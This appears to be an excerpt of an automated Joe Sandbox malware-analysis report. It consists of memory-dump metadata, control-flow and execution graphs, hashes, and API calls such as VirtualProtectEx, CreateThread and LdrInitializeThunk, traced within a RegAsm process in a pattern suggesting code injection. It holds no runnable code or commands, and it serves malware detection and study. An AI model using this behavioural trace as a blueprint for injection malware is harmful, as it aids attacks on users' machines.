                                                                            • Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_9c0000_gold.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: f4782b8d2c1a5017cfdc0506346e129da99aa3b03dfa55aeb88bac6c2469e37c
                                                                            • Instruction ID: 4be121391abeb624e127d4dc0a21cf59381ad5f440f0a8980ce6a7c66be1287d
                                                                            • Opcode Fuzzy Hash: f4782b8d2c1a5017cfdc0506346e129da99aa3b03dfa55aeb88bac6c2469e37c
                                                                            • Instruction Fuzzy Hash: 3E21D0B5900249DFCB10CF9AD984ADEBBF4FB48310F20842EE919A7250D374AA54CBA5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 93 9c04d0-9c0e8b 97 9c0e93-9c0ed1 VirtualProtectEx 93->97 98 9c0ed8-9c0eec 97->98 99 9c0ed3 97->99 99->98
                                                                            APIs
                                                                            • VirtualProtectEx.KERNELBASE(?,037A3594,00000040,?,?), ref: 009C0EC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_9c0000_gold.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: f384d661bbdf53e7ce819816c9aabc9ecb8fd09f5a1e95166467bdfdda676a4c
                                                                            • Instruction ID: e1cfe962bcb264807077f544b70d4aef1d5781900de6cdbbd6267a52ce90fbed
                                                                            • Opcode Fuzzy Hash: f384d661bbdf53e7ce819816c9aabc9ecb8fd09f5a1e95166467bdfdda676a4c
                                                                            • Instruction Fuzzy Hash: 5C2123B1C05298EFCB00DFAAC884ADEFFB4FF49310F10815AE518A7210C378A514CBA5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 100 9c04e4-9c0ed1 VirtualProtectEx 103 9c0ed8-9c0eec 100->103 104 9c0ed3 100->104 104->103
                                                                            APIs
                                                                            • VirtualProtectEx.KERNELBASE(?,037A3594,00000040,?,?), ref: 009C0EC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_9c0000_gold.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 3d030dc2b570212d028075f8fa8bf1a7a7626625a41c39fb4c8e0015d54a5f83
                                                                            • Instruction ID: 612333f1d2496388d878029b90014d4bdb14ca833058818fb8b2a057a4acbd32
                                                                            • Opcode Fuzzy Hash: 3d030dc2b570212d028075f8fa8bf1a7a7626625a41c39fb4c8e0015d54a5f83
                                                                            • Instruction Fuzzy Hash: 4521E0B5D01259EFCB10DF9AC984ADEFBB4FB48310F10852AE918A7210C375A950CFA1

                                                                            Execution Graph

                                                                            Execution Coverage:13.4%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:2.5%
                                                                            Total number of Nodes:159
                                                                            Total number of Limit Nodes:9
                                                                            execution_graph 54340 15ad0b8 54341 15ad0fe 54340->54341 54345 15ad298 54341->54345 54349 15ad289 54341->54349 54342 15ad1eb 54346 15ad29d 54345->54346 54353 15ac9a0 54346->54353 54350 15ad298 54349->54350 54351 15ac9a0 DuplicateHandle 54350->54351 54352 15ad2c6 54351->54352 54352->54342 54354 15ad300 DuplicateHandle 54353->54354 54355 15ad2c6 54354->54355 54355->54342 54356 15a4668 54357 15a4684 54356->54357 54358 15a4696 54357->54358 54362 15a47a0 54357->54362 54367 15a3e10 54358->54367 54360 15a46b5 54363 15a47c5 54362->54363 54374 15a48b0 54363->54374 54378 15a48a1 54363->54378 54368 15a3e1b 54367->54368 54386 15a5c54 54368->54386 54370 15a6ff0 54371 15a6ff8 54370->54371 54390 5876948 54370->54390 54395 5876938 54370->54395 54371->54360 54376 15a48d7 54374->54376 54375 15a49b4 54375->54375 54376->54375 54382 15a4248 54376->54382 54379 15a48d7 54378->54379 54380 15a49b4 54379->54380 54381 15a4248 CreateActCtxA 54379->54381 54381->54380 54383 15a5940 CreateActCtxA 54382->54383 54385 15a5a03 54383->54385 54387 15a5c5f 54386->54387 54400 15a5c64 54387->54400 54389 15a709d 54389->54370 54391 587696b 54390->54391 54392 5876e5d 54391->54392 54464 6e41b28 54391->54464 54469 6e41b38 54391->54469 54396 5876948 54395->54396 54397 5876e5d 54396->54397 54398 6e41b28 4 API calls 54396->54398 54399 6e41b38 4 API calls 54396->54399 54398->54396 54399->54396 54401 15a5c6f 54400->54401 54404 15a5c94 54401->54404 54403 15a717a 54403->54389 54405 15a5c9f 54404->54405 54408 15a5cc4 54405->54408 54407 15a726d 54407->54403 54409 15a5ccf 54408->54409 54411 15a8653 54409->54411 54415 15aad01 54409->54415 54410 15a8691 54410->54407 54411->54410 54419 15acde0 54411->54419 54424 15acdf0 54411->54424 54429 15aad38 54415->54429 54433 15aad28 54415->54433 54416 15aad16 54416->54411 54420 15ace11 54419->54420 54421 15ace35 54420->54421 54448 15acf90 54420->54448 54452 15acfa0 54420->54452 54421->54410 54425 15ace11 54424->54425 54426 15ace35 54425->54426 54427 15acf90 2 API calls 54425->54427 54428 15acfa0 2 API calls 54425->54428 54426->54410 54427->54426 54428->54426 54438 15aae20 54429->54438 54443 15aae30 54429->54443 54430 15aad47 54430->54416 54434 15aad38 54433->54434 54436 15aae30 GetModuleHandleW 54434->54436 54437 15aae20 GetModuleHandleW 54434->54437 54435 15aad47 54435->54416 54436->54435 54437->54435 54439 15aae64 54438->54439 54440 15aae41 54438->54440 54439->54430 54440->54439 54441 15ab068 GetModuleHandleW 54440->54441 54442 15ab095 54441->54442 54442->54430 54444 15aae64 54443->54444 54445 15aae41 54443->54445 54444->54430 54445->54444 54446 15ab068 GetModuleHandleW 54445->54446 54447 15ab095 54446->54447 54447->54430 54449 15acfa0 54448->54449 54450 15acfe7 54449->54450 54456 15ac8d8 54449->54456 54450->54421 54453 15acfa5 54452->54453 54454 15acfe7 54453->54454 54455 15ac8d8 2 API calls 54453->54455 54454->54421 54455->54454 54457 15ac8dd 54456->54457 54459 15ad8f8 54457->54459 54460 15aca04 54457->54460 54459->54459 54461 15aca0f 54460->54461 54462 15a5cc4 2 API calls 54461->54462 54463 15ad967 54462->54463 54463->54459 54465 6e41b38 54464->54465 54474 6e41b89 54465->54474 54479 6e41f9a 54465->54479 54466 6e41b6e 54466->54391 54470 6e41b3e 54469->54470 54472 6e41b89 4 API calls 54470->54472 54473 6e41f9a 4 API calls 54470->54473 54471 6e41b6e 54471->54391 54472->54471 54473->54471 54475 6e41b98 54474->54475 54476 6e41fd0 54475->54476 54484 6e43d98 54475->54484 54489 6e43d8b 54475->54489 54476->54466 54480 6e41f68 54479->54480 54481 6e41fd0 54480->54481 54482 6e43d98 4 API calls 54480->54482 54483 6e43d8b 4 API calls 54480->54483 54481->54466 54482->54480 54483->54480 54485 6e43dbf 54484->54485 54494 6e44082 54485->54494 54501 6e43fff 54485->54501 54486 6e43e08 54486->54475 54490 6e43dbf 54489->54490 54492 6e44082 3 API calls 54490->54492 54493 6e43fff 3 API calls 54490->54493 54491 6e43e08 54491->54475 54492->54491 54493->54491 54495 6e44095 54494->54495 54508 6e441e0 54495->54508 54512 6e441d0 54495->54512 54496 6e440f6 KiUserExceptionDispatcher 54498 6e4416f 54496->54498 54498->54486 54502 6e4402c 54501->54502 54506 6e441e0 LdrInitializeThunk 54502->54506 54507 6e441d0 LdrInitializeThunk 54502->54507 54503 6e440f6 KiUserExceptionDispatcher 54505 6e4416f 54503->54505 54505->54486 54506->54503 54507->54503 54509 6e44207 54508->54509 54510 6e4423f LdrInitializeThunk 54509->54510 54511 6e44237 54509->54511 54510->54511 54511->54496 54513 6e44237 54512->54513 54514 6e441de 54512->54514 54513->54496 54514->54513 54515 6e4423f LdrInitializeThunk 54514->54515 54515->54513 54320 5874293 54323 5870bfc 54320->54323 54322 58742aa 54324 5870c07 54323->54324 54325 587435a CallWindowProcW 54324->54325 54326 5874309 54324->54326 54325->54326 54326->54322 54327 147d01c 54328 147d034 54327->54328 54329 147d08e 54328->54329 54332 5870ad4 54328->54332 54336 5872c08 54328->54336 54333 5870adf 54332->54333 54334 5870bfc CallWindowProcW 54333->54334 54335 5872c69 54333->54335 54334->54335 54338 5872c45 54336->54338 54337 5870bfc CallWindowProcW 54339 5872c69 54337->54339 54338->54337 54338->54339 54312 6e43ee8 54313 6e43ef3 54312->54313 54314 6e43f03 54313->54314 54316 6e437e4 54313->54316 54317 6e43f38 OleInitialize 54316->54317 54319 6e43f9c 54317->54319 54319->54314

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 598 6e4f2d8-6e4f308 599 6e4f30f-6e4f404 598->599 600 6e4f30a 598->600 609 6e4f406 599->609 610 6e4f40b-6e4f439 599->610 600->599 609->610 612 6e4f7e1-6e4f7ea 610->612 613 6e4f7f0-6e4f872 612->613 614 6e4f43e-6e4f447 612->614 629 6e4f874 613->629 630 6e4f879-6e4f8a7 613->630 615 6e4f44e-6e4f568 call 6e4d9ec call 6e43830 614->615 616 6e4f449 614->616 653 6e4f70b-6e4f711 615->653 616->615 629->630 633 6e4fc64-6e4fc6d 630->633 634 6e4fc73-6e4fca3 633->634 635 6e4f8ac-6e4f8b5 633->635 638 6e4f8b7 635->638 639 6e4f8bc-6e4f9d6 call 6e4d9ec call 6e43830 635->639 638->639 681 6e4fb8b-6e4fb91 639->681 655 6e4f718-6e4f71f 653->655 656 6e4f725-6e4f742 655->656 657 6e4f56d-6e4f605 call 6e43840 655->657 661 6e4f744-6e4f750 656->661 662 6e4f751-6e4f752 656->662 679 6e4f607-6e4f61f 657->679 680 6e4f621 657->680 661->662 662->612 682 6e4f627-6e4f648 679->682 680->682 683 6e4fb98-6e4fb9f 681->683 687 6e4f64e-6e4f6c9 call 6e43840 682->687 688 6e4f6fa-6e4f70a 682->688 685 6e4fba5-6e4fbc2 683->685 686 6e4f9db-6e4fa79 call 6e43840 683->686 692 6e4fbc4-6e4fbd0 685->692 693 6e4fbd1 685->693 710 6e4fa95 686->710 711 6e4fa7b-6e4fa93 686->711 705 6e4f6e5 687->705 706 6e4f6cb-6e4f6e3 687->706 688->653 692->693 693->633 708 6e4f6eb-6e4f6f9 705->708 706->708 708->688 712 6e4fa9b-6e4fabc 710->712 711->712 715 6e4fb77-6e4fb8a 712->715 716 6e4fac2-6e4fb46 call 6e43840 712->716 715->681 724 6e4fb62 716->724 725 6e4fb48-6e4fb60 716->725 726 6e4fb68-6e4fb76 724->726 725->726 726->715
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 2ad3237f6277dc737cf5b01827a191ce341169efe9c32a7c0ebdb7cc71dc9909
                                                                            • Instruction ID: 646d02dd66a3d6c77e4be7d9be1e4116b79dc547e37c82c2a08bac08665ff583
                                                                            • Opcode Fuzzy Hash: 2ad3237f6277dc737cf5b01827a191ce341169efe9c32a7c0ebdb7cc71dc9909
                                                                            • Instruction Fuzzy Hash: 2632C270E01229CFDB64DF65C890BDEB7B2BB89300F5095E9C40AAB250DB349E81CF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 728 6e4e7b8-6e4e7e8 729 6e4e7ef-6e4e8b8 call 6e49fc4 728->729 730 6e4e7ea 728->730 740 6e4eb9a-6e4eba3 729->740 730->729 741 6e4e8bd-6e4e8c6 740->741 742 6e4eba9-6e4ebc4 740->742 743 6e4e8cd-6e4e8f1 741->743 744 6e4e8c8 741->744 746 6e4ebc6-6e4ebcf 742->746 747 6e4ebd0 742->747 750 6e4e8f3-6e4e8fc 743->750 751 6e4e8fe-6e4e943 743->751 744->743 746->747 752 6e4ebd1 747->752 753 6e4e954-6e4e95b 750->753 779 6e4e94e 751->779 752->752 755 6e4e985 753->755 756 6e4e95d-6e4e969 753->756 757 6e4e98b-6e4e992 755->757 758 6e4e973-6e4e979 756->758 759 6e4e96b-6e4e971 756->759 760 6e4e994-6e4e99d 757->760 761 6e4e99f-6e4e9f3 757->761 763 6e4e983 758->763 759->763 764 6e4ea04-6e4ea0b 760->764 788 6e4e9fe 761->788 763->757 767 6e4ea35 764->767 768 6e4ea0d-6e4ea19 764->768 771 6e4ea3b-6e4ea4d 767->771 769 6e4ea23-6e4ea29 768->769 770 6e4ea1b-6e4ea21 768->770 772 6e4ea33 769->772 770->772 776 6e4ea4f-6e4ea68 771->776 777 6e4ea6a-6e4ea6c 771->777 772->771 780 6e4ea6f-6e4ea7a 776->780 777->780 779->753 783 6e4eb50-6e4eb6b 780->783 784 6e4ea80-6e4eb4f 780->784 786 6e4eb77 783->786 787 6e4eb6d-6e4eb76 783->787 784->783 786->740 787->786 788->764
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 2aa98f834fcddab2b090b8b9e2870ee0b7cb26f656369d44a1f7450da60ffcc6
                                                                            • Instruction ID: b3d1110d1cc75a3c68ee5134bd42938e7ab4ab6fd1e08aef54f9c03cbf71f1fc
                                                                            • Opcode Fuzzy Hash: 2aa98f834fcddab2b090b8b9e2870ee0b7cb26f656369d44a1f7450da60ffcc6
                                                                            • Instruction Fuzzy Hash: 3DC1E870E01219CFDB68DFA5D9907AEBBB2FF89300F5091A9C40AAB254DB345D86CF51

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 971 6e4de60-6e4de91 972 6e4de93 971->972 973 6e4de98-6e4df05 call 6e48db0 971->973 972->973 979 6e4df0a-6e4df57 973->979 983 6e4e18f-6e4e1a3 979->983 985 6e4df5c-6e4e046 call 6e4d7d0 983->985 986 6e4e1a9-6e4e1cd 983->986 1002 6e4e123-6e4e133 985->1002 992 6e4e1ce 986->992 992->992 1004 6e4e139-6e4e163 1002->1004 1005 6e4e04b-6e4e061 1002->1005 1011 6e4e165-6e4e16e 1004->1011 1012 6e4e16f 1004->1012 1008 6e4e063-6e4e06f 1005->1008 1009 6e4e08b 1005->1009 1013 6e4e071-6e4e077 1008->1013 1014 6e4e079-6e4e07f 1008->1014 1015 6e4e091-6e4e0f6 1009->1015 1011->1012 1012->983 1016 6e4e089 1013->1016 1014->1016 1022 6e4e10f-6e4e122 1015->1022 1023 6e4e0f8-6e4e10e 1015->1023 1016->1015 1022->1002 1023->1022
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR]q$PH]q
                                                                            • API String ID: 0-3791814328
                                                                            • Opcode ID: 0dec0872c3e7ed8030099ae99e7cc61326684582e0580c50a11ee4eeea0b0185
                                                                            • Instruction ID: 66ffad5eb9395fcd557018393efad11c3322741e0f548b38fa9ddf13c53c3f05
                                                                            • Opcode Fuzzy Hash: 0dec0872c3e7ed8030099ae99e7cc61326684582e0580c50a11ee4eeea0b0185
                                                                            • Instruction Fuzzy Hash: 6DA1E274E00319CFDB64DFA5D854BAEBBB2BF89304F1094A9D409AB364DB305985CF51

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1026 6e4ba05-6e4ba28 1027 6e4ba2f-6e4bab6 1026->1027 1028 6e4ba2a 1026->1028 1032 6e4bab8-6e4bad7 1027->1032 1033 6e4bada-6e4baf3 call 6e49fc4 1027->1033 1028->1027 1032->1033 1037 6e4bc77-6e4bc8d 1033->1037 1038 6e4bc93-6e4bcb7 1037->1038 1039 6e4baf8-6e4bb1e 1037->1039 1044 6e4bb25-6e4bb55 1039->1044 1045 6e4bb20 1039->1045 1048 6e4bb76 1044->1048 1049 6e4bb57-6e4bb60 1044->1049 1045->1044 1052 6e4bb79-6e4bc06 1048->1052 1050 6e4bb67-6e4bb6a 1049->1050 1051 6e4bb62-6e4bb65 1049->1051 1053 6e4bb74 1050->1053 1051->1053 1061 6e4bc53-6e4bc64 1052->1061 1062 6e4bc08-6e4bc1c 1052->1062 1053->1052 1065 6e4bc65-6e4bc74 1061->1065 1066 6e4bc25-6e4bc51 1062->1066 1065->1037 1066->1065
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q
                                                                            • API String ID: 0-127220927
                                                                            • Opcode ID: 2c831e5fffd277e07ffec15d06d23d1f052b0fac6f3af1a6177c1d450d12bf15
                                                                            • Instruction ID: cf756583748ce447ec04bafdf05fb0c989b3d7e782480cf65c9f0a4ad3eefef1
                                                                            • Opcode Fuzzy Hash: 2c831e5fffd277e07ffec15d06d23d1f052b0fac6f3af1a6177c1d450d12bf15
                                                                            • Instruction Fuzzy Hash: 7791C074E01218CFDB58DFB9E584A9DBBB2FF89305F609069D809AB354DB359982CF00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @B/
                                                                            • API String ID: 0-3863299084
                                                                            • Opcode ID: 61bb4392a05a878b0477ba311f2d815d85edf6e0fc4328c903a4ed3313c665c6
                                                                            • Instruction ID: 9dda7075cda75a718ab9707be75086da6b055400b1f10ec44ae8cddd515183d4
                                                                            • Opcode Fuzzy Hash: 61bb4392a05a878b0477ba311f2d815d85edf6e0fc4328c903a4ed3313c665c6
                                                                            • Instruction Fuzzy Hash: 2382AD74E02229CFDBA4DF69D984BDDBBB2BB49705F1091EAD409A7250DB309E81CF50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b429edbeba1ade6c51358f0b730af2181c82316a9b9b31a241ea28d3c65257b5
                                                                            • Instruction ID: 5ec3e81e6c75ffa71ee7b61eedbb9b47880c6260b99b98cb8aae0826bd148841
                                                                            • Opcode Fuzzy Hash: b429edbeba1ade6c51358f0b730af2181c82316a9b9b31a241ea28d3c65257b5
                                                                            • Instruction Fuzzy Hash: 99217D74E02218DFCB48EFA9E484ADDBBF6FB89311F14906AE415B7360DB305851CB64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VOi
                                                                            • API String ID: 0-2334242610
                                                                            • Opcode ID: 2d9eb18b0d3725c493a8cffafd00af236a866c953e1ba299992eef7c5f29022b
                                                                            • Instruction ID: 887d19a1fee24ae90410f87fa4fe73f031692c0ad346f7e2cd9e766907687b78
                                                                            • Opcode Fuzzy Hash: 2d9eb18b0d3725c493a8cffafd00af236a866c953e1ba299992eef7c5f29022b
                                                                            • Instruction Fuzzy Hash: 40B17C70E003098FDF54DFB9D8957DEBBF2AF89308F149129E815A7294EB349846CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ee5665a06ff67b7038b8575ab62e0f182fb26912858970719b9ed28f5ccb63c
                                                                            • Instruction ID: 189145cc9e94f5b404b3de406c59ead6c9490e59d540b432b6dd1f2e85042959
                                                                            • Opcode Fuzzy Hash: 7ee5665a06ff67b7038b8575ab62e0f182fb26912858970719b9ed28f5ccb63c
                                                                            • Instruction Fuzzy Hash: 8042DE70E01229CFDB64DF69D854BDEBBB2BB89300F1084E9D40AAB254DB315E85CF81
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 51813a0e17329ff19dc0d6ebfc10fc964383edbc3465502207d3ebefb342fb3d
                                                                            • Instruction ID: f90c8c6ce73c4276d2b617b93af007fa34a3e1f0721331813b338e576761b211
                                                                            • Opcode Fuzzy Hash: 51813a0e17329ff19dc0d6ebfc10fc964383edbc3465502207d3ebefb342fb3d
                                                                            • Instruction Fuzzy Hash: 47220475901228CFDB69DF65C948BE9BBB2FF4A300F0090E9D509A72A1DB359E84CF41
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: acd910af163cb98a3d8b73570ebfdfc440d506eebf9c95e73d803c41288026dc
                                                                            • Instruction ID: 2346e4280d74f953abb0c2ea891b96729d908a6a7819c17df2da40f088633f36
                                                                            • Opcode Fuzzy Hash: acd910af163cb98a3d8b73570ebfdfc440d506eebf9c95e73d803c41288026dc
                                                                            • Instruction Fuzzy Hash: 2FF1F670A002099FCB55EF68D940B9EBBF6FF88304F1485A9E505DB2A2EB34DD45CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4c963b9d871e85b0050f192f7e103398535b8f5bc7c86adebc834393a2d6430
                                                                            • Instruction ID: e3911e677fc4067d2f1955d595c6833ae9323df8158490ec56e96ed94d2e46af
                                                                            • Opcode Fuzzy Hash: a4c963b9d871e85b0050f192f7e103398535b8f5bc7c86adebc834393a2d6430
                                                                            • Instruction Fuzzy Hash: E8E131B0E00349DFDB44EFF5D955AAE7BBBEF98200F014429990AA73A4DA349C05CF56
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab5e877ff0b74442d692640a6238c1d76ae982739f15a73eb4e00d563b246b47
                                                                            • Instruction ID: 26bca9c9b1318379a3f76db514cd6bc4bdc46b7a0cfcd080c63663d96ef74153
                                                                            • Opcode Fuzzy Hash: ab5e877ff0b74442d692640a6238c1d76ae982739f15a73eb4e00d563b246b47
                                                                            • Instruction Fuzzy Hash: EAE132B0E00349DFDB44EFF5D955AAE7BBBEF98600F014429990AA73A4DA349C05CF16
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 668f1af583c0be0627ed191c65606684a87f925f8597ec0b637120991f9c858b
                                                                            • Instruction ID: 026d0ccd497af29789b08865bb08386f07f5cbd2e11d47ceba6521401edd17d2
                                                                            • Opcode Fuzzy Hash: 668f1af583c0be0627ed191c65606684a87f925f8597ec0b637120991f9c858b
                                                                            • Instruction Fuzzy Hash: 6EF1B070A01229CFDB68DF65D850B9EBBB2BF89304F2081A9C509A7355DB315E85CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bdcecc93c81e9d8ca390ebe75f31217f662cdb8f19924b9ae0e2ce587ea6e116
                                                                            • Instruction ID: 9cf4fa26da32a8c809ab76f3463a6a4b0ddaba215203c1d8f4b46038db9dc0df
                                                                            • Opcode Fuzzy Hash: bdcecc93c81e9d8ca390ebe75f31217f662cdb8f19924b9ae0e2ce587ea6e116
                                                                            • Instruction Fuzzy Hash: 89E1C074E01229CFDB64DFA5C940BAEBBB2BF89300F5091AAD449A7254DB309E85CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d8fecac929a9df093f9c1784cfc4db89924af5954136df198ecb74df881e799
                                                                            • Instruction ID: 299f782050d434b71b60295a60b136338ebd95aaa1c48adb42e04b00d089e3cb
                                                                            • Opcode Fuzzy Hash: 7d8fecac929a9df093f9c1784cfc4db89924af5954136df198ecb74df881e799
                                                                            • Instruction Fuzzy Hash: 84D1E7B0E00218CFDB14EFB4D85469DBBB2FF8A305F1082A9D40AAB754DB395986CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 013ea9c443da4e8c603ffa4fbec48c22e8bd25638c0aa9737e75e97050bd73a1
                                                                            • Instruction ID: dad3a1dac00234af165d77ca11c8fe706c1dabc2994ee3626f32fb613cbcac98
                                                                            • Opcode Fuzzy Hash: 013ea9c443da4e8c603ffa4fbec48c22e8bd25638c0aa9737e75e97050bd73a1
                                                                            • Instruction Fuzzy Hash: 60D1C274E01318CFDB64DFA9D884B9DBBB2BF89304F1091AAD409AB395DB349985CF50
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3e04e639baf7d052a10561b8ec685305103e94e42cb87ef7ceb313132913480
                                                                            • Instruction ID: a88b3a2b3d14536084158055ca01ca268cc7301ef01264ed47eb540c14e388e6
                                                                            • Opcode Fuzzy Hash: a3e04e639baf7d052a10561b8ec685305103e94e42cb87ef7ceb313132913480
